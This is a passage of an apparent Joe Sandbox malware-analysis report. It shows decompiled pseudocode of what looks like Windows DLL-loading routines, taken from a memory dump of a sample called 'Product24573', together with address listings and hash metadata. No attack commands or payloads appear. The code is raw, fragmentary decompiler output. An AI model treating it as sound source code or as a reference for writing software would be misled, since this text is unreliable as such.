														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0110FFB0(_t287, _t353, 0x11e84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0114CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01106600(0x11e52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01107926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x11eb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0117E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x11e8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x11eb1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x11eb218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01112280(_t250, 0x11e84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L01133898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0110FFB0(_t293, _t353, 0x11e84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E011337F5(_t353, 0);
																}
																E01130413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E01129B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E011202D6(_t174);
																}
																L011177F0( *0x11e7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0112C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0110EC7F(_t353);
										L011219B8(_t287, 0, _t353, 0);
										_t200 = E010FF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x11eb2f8 |  *0x11eb2fc) == 0 || ( *0x11eb2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0113B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x11eb2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E011A6B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E011A6AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0110E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0110EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E01139730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E0110E9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L01108F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01133C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                          0x0110d5f2
                                          0x0110d5f5
                                          0x0110d5f5
                                          0x0110d5fd
                                          0x0110d600
                                          0x0110d60a
                                          0x0110d60d
                                          0x0110d617
                                          0x0110d61d
                                          0x0110d627
                                          0x0110d62e
                                          0x0110d911
                                          0x0110d913
                                          0x00000000
                                          0x0110d919
                                          0x0110d919
                                          0x0110d919
                                          0x0110d634
                                          0x0110d634
                                          0x0110d634
                                          0x0110d634
                                          0x0110d640
                                          0x0110d8bf
                                          0x00000000
                                          0x0110d646
                                          0x0110d646
                                          0x0110d64d
                                          0x0110d652
                                          0x0115b2fc
                                          0x0115b2fc
                                          0x0115b302
                                          0x0115b33b
                                          0x0115b341
                                          0x00000000
                                          0x0115b304
                                          0x0115b304
                                          0x0115b319
                                          0x0115b31e
                                          0x0115b324
                                          0x0115b326
                                          0x0115b332
                                          0x0115b347
                                          0x0115b34c
                                          0x0115b351
                                          0x0115b35a
                                          0x00000000
                                          0x0115b328
                                          0x0115b328
                                          0x00000000
                                          0x0115b328
                                          0x0115b326
                                          0x0110d658
                                          0x0110d658
                                          0x0110d65b
                                          0x0110d665
                                          0x00000000
                                          0x0110d66b
                                          0x0110d66b
                                          0x0110d66b
                                          0x0110d66b
                                          0x0110d66d
                                          0x0110d672
                                          0x0110d67a
                                          0x00000000
                                          0x00000000
                                          0x0110d680
                                          0x0110d686
                                          0x0110d8ce
                                          0x0110d8d4
                                          0x0110d8dd
                                          0x0110d8e0
                                          0x0110d68c
                                          0x0110d691
                                          0x0110d69d
                                          0x0110d6a2
                                          0x0110d6a7
                                          0x0110d6b0
                                          0x0110d6b5
                                          0x0110d6e0
                                          0x0110d6b7
                                          0x0110d6b7
                                          0x0110d6b9
                                          0x0110d6b9
                                          0x0110d6bb
                                          0x0110d6bd
                                          0x0110d6ce
                                          0x0110d6d0
                                          0x0110d6d2
                                          0x0115b363
                                          0x0115b365
                                          0x00000000
                                          0x0115b36b
                                          0x00000000
                                          0x0115b36b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0110d6bf
                                          0x0110d6bf
                                          0x0110d6e5
                                          0x0110d6e7
                                          0x0110d6e9
                                          0x0110d6ec
                                          0x0110d6ec
                                          0x0110d6ef
                                          0x0110d6f5
                                          0x0110d6f9
                                          0x0110d6fb
                                          0x0110d6fd
                                          0x0110d701
                                          0x0110d703
                                          0x0110d70a
                                          0x0110d70a
                                          0x0110d701
                                          0x0110d710
                                          0x0110d710
                                          0x0110d6c1
                                          0x0110d6c1
                                          0x0110d6c6
                                          0x0115b36d
                                          0x0115b36f
                                          0x00000000
                                          0x0115b375
                                          0x0115b375
                                          0x0115b375
                                          0x00000000
                                          0x0115b375
                                          0x00000000
                                          0x0110d6cc
                                          0x0110d6d8
                                          0x0110d6d8
                                          0x0110d6d8
                                          0x00000000
                                          0x0110d6c6
                                          0x0110d6bf
                                          0x00000000
                                          0x0110d6da
                                          0x0110d6da
                                          0x0110d716
                                          0x0110d71b
                                          0x0110d720
                                          0x0110d726
                                          0x0110d726
                                          0x0110d72d
                                          0x00000000
                                          0x0110d733
                                          0x0110d739
                                          0x0110d742
                                          0x0110d750
                                          0x0110d758
                                          0x0110d764
                                          0x0110d776
                                          0x0110d77a
                                          0x0110d783
                                          0x0110d928
                                          0x0110d92c
                                          0x0110d93d
                                          0x0110d944
                                          0x0110d94f
                                          0x0110d954
                                          0x0110d956
                                          0x0110d95f
                                          0x0110d961
                                          0x0110d973
                                          0x0110d973
                                          0x0110d956
                                          0x0110d944
                                          0x0110d92c
                                          0x0110d78b
                                          0x0115b394
                                          0x0110d791
                                          0x0110d798
                                          0x0115b3a3
                                          0x0115b3bb
                                          0x0115b3bb
                                          0x0110d7a5
                                          0x0110d866
                                          0x0110d870
                                          0x0110d892
                                          0x0110d898
                                          0x0110d89e
                                          0x0110d8a0
                                          0x0110d8a6
                                          0x0110d8ac
                                          0x0110d8ae
                                          0x0110d8b4
                                          0x0110d8b4
                                          0x0110d8ae
                                          0x0110d7a5
                                          0x0110d78b
                                          0x0110d7b1
                                          0x0115b3c5
                                          0x0115b3c5
                                          0x0110d7c3
                                          0x0110d7ca
                                          0x0110d7e5
                                          0x0110d7eb
                                          0x0110d8eb
                                          0x0110d8ed
                                          0x00000000
                                          0x0110d8f3
                                          0x0110d8f3
                                          0x0110d8f3
                                          0x00000000
                                          0x0110d8ed
                                          0x0110d7cc
                                          0x0110d7cc
                                          0x0110d7d2
                                          0x00000000
                                          0x0110d7d4
                                          0x0110d7d4
                                          0x0110d7d7
                                          0x0110d7df
                                          0x0115b3d4
                                          0x0115b3d9
                                          0x0115b3dc
                                          0x0115b3dc
                                          0x0115b3df
                                          0x0115b3e2
                                          0x0115b468
                                          0x0115b46d
                                          0x0115b46f
                                          0x0115b46f
                                          0x0115b475
                                          0x0110d8f8
                                          0x0110d8f9
                                          0x0110d8fd
                                          0x0115b3e8
                                          0x0115b3e8
                                          0x0115b3eb
                                          0x0115b3ed
                                          0x00000000
                                          0x0115b3ef
                                          0x0115b3ef
                                          0x0115b3f1
                                          0x0115b3f4
                                          0x0115b3fe
                                          0x0115b404
                                          0x0115b409
                                          0x0115b40e
                                          0x0115b410
                                          0x0115b410
                                          0x0115b414
                                          0x0115b414
                                          0x0115b41b
                                          0x0115b420
                                          0x0115b423
                                          0x0115b425
                                          0x0115b427
                                          0x0115b42a
                                          0x0115b42d
                                          0x0115b42d
                                          0x0115b42a
                                          0x0115b432
                                          0x0115b436
                                          0x0115b438
                                          0x0115b43b
                                          0x0115b43b
                                          0x0115b449
                                          0x0115b44e
                                          0x0115b454
                                          0x0115b458
                                          0x0115b458
                                          0x0115b45d
                                          0x00000000
                                          0x0115b45d
                                          0x0115b3ed
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0110d7df
                                          0x0110d7d2
                                          0x0110d7ca
                                          0x0115b37c
                                          0x0115b37e
                                          0x0115b385
                                          0x0115b38a
                                          0x00000000
                                          0x0115b38a
                                          0x0110d742
                                          0x0110d7f1
                                          0x0110d7f8
                                          0x0115b49b
                                          0x0115b49b
                                          0x0110d800
                                          0x0110d837
                                          0x0110d843
                                          0x0110d845
                                          0x0110d847
                                          0x0110d84a
                                          0x0110d84b
                                          0x0110d84e
                                          0x0110d857
                                          0x0110d818
                                          0x0110d824
                                          0x0110d831
                                          0x0115b4a5
                                          0x0115b4ab
                                          0x0115b4b3
                                          0x0115b4b8
                                          0x0115b4bb
                                          0x00000000
                                          0x0115b4c1
                                          0x0115b4c1
                                          0x0115b4c8
                                          0x00000000
                                          0x0115b4ce
                                          0x0115b4d4
                                          0x0115b4e1
                                          0x0115b4e3
                                          0x0115b4e5
                                          0x00000000
                                          0x0115b4eb
                                          0x0115b4f0
                                          0x0115b4f2
                                          0x0110dac9
                                          0x0110dacc
                                          0x0110dacf
                                          0x0110dad1
                                          0x0110dd78
                                          0x0110dd78
                                          0x0110dcf2
                                          0x00000000
                                          0x0110dad7
                                          0x0110dad9
                                          0x0110dadb
                                          0x00000000
                                          0x00000000
                                          0x0110dae1
                                          0x0110dae1
                                          0x0110dae4
                                          0x0110dae6
                                          0x0115b4f9
                                          0x0115b4f9
                                          0x0115b500
                                          0x0110daec
                                          0x0110daec
                                          0x0110daf5
                                          0x0110daf8
                                          0x0110dafb
                                          0x0110db03
                                          0x0110db11
                                          0x0110db16
                                          0x0110db19
                                          0x0110db1b
                                          0x0115b52c
                                          0x0115b531
                                          0x0115b534
                                          0x0110db21
                                          0x0110db21
                                          0x0110db24
                                          0x0110dcd9
                                          0x0110dce2
                                          0x0110dce5
                                          0x0110dd6a
                                          0x0110dd6d
                                          0x00000000
                                          0x0110dd73
                                          0x0115b51a
                                          0x0115b51c
                                          0x0115b51f
                                          0x0115b524
                                          0x00000000
                                          0x0115b524
                                          0x0110dce7
                                          0x0110dce7
                                          0x0110dce7
                                          0x00000000
                                          0x0110dce7
                                          0x00000000
                                          0x0110db2a
                                          0x0110db2c
                                          0x0110db31
                                          0x0110db33
                                          0x0110db36
                                          0x0110db39
                                          0x0110db3b
                                          0x0110db66
                                          0x0110db66
                                          0x0110db3d
                                          0x0110db3d
                                          0x0110db3e
                                          0x0110db46
                                          0x0110db47
                                          0x0110db49
                                          0x0110db4c
                                          0x0110db53
                                          0x0110db55
                                          0x0110db58
                                          0x0110db5a
                                          0x0115b50a
                                          0x0115b50f
                                          0x0115b512
                                          0x0110db60
                                          0x0110db60
                                          0x0110db63
                                          0x0110db63
                                          0x00000000
                                          0x0110db63
                                          0x0110db5a
                                          0x0110db3b
                                          0x0110db24
                                          0x0110db69
                                          0x0110db69
                                          0x0110db6c
                                          0x0110db6f
                                          0x0110db74
                                          0x0115b557
                                          0x0115b557
                                          0x0115b55e
                                          0x0110db7a
                                          0x0110db7c
                                          0x0110db7f
                                          0x0110db82
                                          0x0110db85
                                          0x00000000
                                          0x0110db8b
                                          0x0110db8b
                                          0x0110db8d
                                          0x0110db9b
                                          0x0110db9b
                                          0x0110db9d
                                          0x0110dba0
                                          0x0110dba2
                                          0x0110dba4
                                          0x0110dba7
                                          0x0110dba9
                                          0x0110dbae
                                          0x0110dbae
                                          0x0110dbb1
                                          0x0110dbb4
                                          0x0110dbb4
                                          0x0110dbb7
                                          0x0110dbba
                                          0x0110dcd2
                                          0x0110dcd4
                                          0x00000000
                                          0x0110dbc0
                                          0x0110dbc0
                                          0x0110dbd2
                                          0x0110dbd7
                                          0x0110dbda
                                          0x0110dbdd
                                          0x0110dbdf
                                          0x00000000
                                          0x0110dbe5
                                          0x0110dbe5
                                          0x0110dbee
                                          0x0110dbf1
                                          0x0115b541
                                          0x0115b544
                                          0x00000000
                                          0x0115b546
                                          0x0115b546
                                          0x00000000
                                          0x0115b546
                                          0x0110dbf7
                                          0x0110dbf7
                                          0x0110dbfd
                                          0x0110dbfd
                                          0x0110dbff
                                          0x0110dc0b
                                          0x0110dc15
                                          0x0110dc1b
                                          0x0110dc1d
                                          0x0110dc21
                                          0x0110dc21
                                          0x0110dc23
                                          0x0110dc23
                                          0x0110dc26
                                          0x0110dc29
                                          0x0110dc2b
                                          0x00000000
                                          0x00000000
                                          0x0110dc31
                                          0x0110dc34
                                          0x0110dc36
                                          0x0110dcbf
                                          0x0110dcbf
                                          0x0110dcc2
                                          0x00000000
                                          0x0110dc3c
                                          0x0110dc41
                                          0x0110dc43
                                          0x00000000
                                          0x0110dc45
                                          0x0110dc45
                                          0x0110dc47
                                          0x00000000
                                          0x0110dc4d
                                          0x0110dc4d
                                          0x0110dc50
                                          0x0110dc52
                                          0x0110dc55
                                          0x0110dcfa
                                          0x0110dcfe
                                          0x0110dd08
                                          0x0110dd0a
                                          0x0110dd0c
                                          0x00000000
                                          0x0110dd12
                                          0x0110dd15
                                          0x0110dd2d
                                          0x0110dd2f
                                          0x0110dd32
                                          0x0110dd35
                                          0x00000000
                                          0x0110dd35
                                          0x0110dc5b
                                          0x0110dc5b
                                          0x0110dc5e
                                          0x0110dc61
                                          0x0110dc64
                                          0x0110dc67
                                          0x0110dc67
                                          0x0110dc6a
                                          0x0110dc6c
                                          0x0110dc8e
                                          0x0110dc8e
                                          0x0110dc91
                                          0x0110dc93
                                          0x0110dcce
                                          0x0110dcce
                                          0x0110dc95
                                          0x0110dc9c
                                          0x0110dc6e
                                          0x0110dc72
                                          0x0110dc75
                                          0x0110dc77
                                          0x0110dc79
                                          0x0115b551
                                          0x0115b551
                                          0x00000000
                                          0x0110dc7f
                                          0x0110dc7f
                                          0x0110dc81
                                          0x00000000
                                          0x0110dc83
                                          0x0110dc86
                                          0x0110dc88
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0110dc88
                                          0x0110dc81
                                          0x0110dc79
                                          0x0110dc6c
                                          0x0110dc55
                                          0x0110dc47
                                          0x0110dc43
                                          0x00000000
                                          0x0110dc36
                                          0x0110dc23
                                          0x00000000
                                          0x0110dbff
                                          0x0110dbf1
                                          0x0110dbdf
                                          0x0110db8f
                                          0x0110db92
                                          0x0110db95
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0110db95
                                          0x0110db8d
                                          0x0110db85
                                          0x0110db74
                                          0x0110dc9f
                                          0x0110dca2
                                          0x0110dcb0
                                          0x0110dcb0
                                          0x0110dad1
                                          0x0115b4e5
                                          0x0115b4c8
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0110d831
                                          0x00000000
                                          0x0110d800
                                          0x0115b47f
                                          0x0115b485
                                          0x00000000
                                          0x0115b485
                                          0x0110d665
                                          0x0110d652
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea33ab36e6757ee96624e15f74aa978d23edc86aa1e5532f3bae8de3c3d77903
                                          • Instruction ID: 83ef8440fbb3b2179fca760713c4bf6278eea477124020fe90ef3f457dffc95c
                                          • Opcode Fuzzy Hash: ea33ab36e6757ee96624e15f74aa978d23edc86aa1e5532f3bae8de3c3d77903
                                          • Instruction Fuzzy Hash: AFE1B330E04656CFEF3E8FD8D844B69BBB2BF45308F0541A9D919572D1D7B09981CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0110849B Relevance: .3, Instructions: 290COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E0110849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x11cf9c0);
				E0114D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x11e7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0110CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01112280( *[fs:0x30], 0x11e8550);
						_t139 =  *0x11e7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0112F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0110FFB0(_t193, _t235, 0x11e8550);
								L5:
								return E0114D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E010F1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x11e7b9c; // 0x0
							_t235 = L01114620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x11e7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0112A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0110FFB0(_t193, _t235, 0x11e8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L011177F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L011177F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x11e7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x11e7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E011337C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x11e7b9c; // 0x0
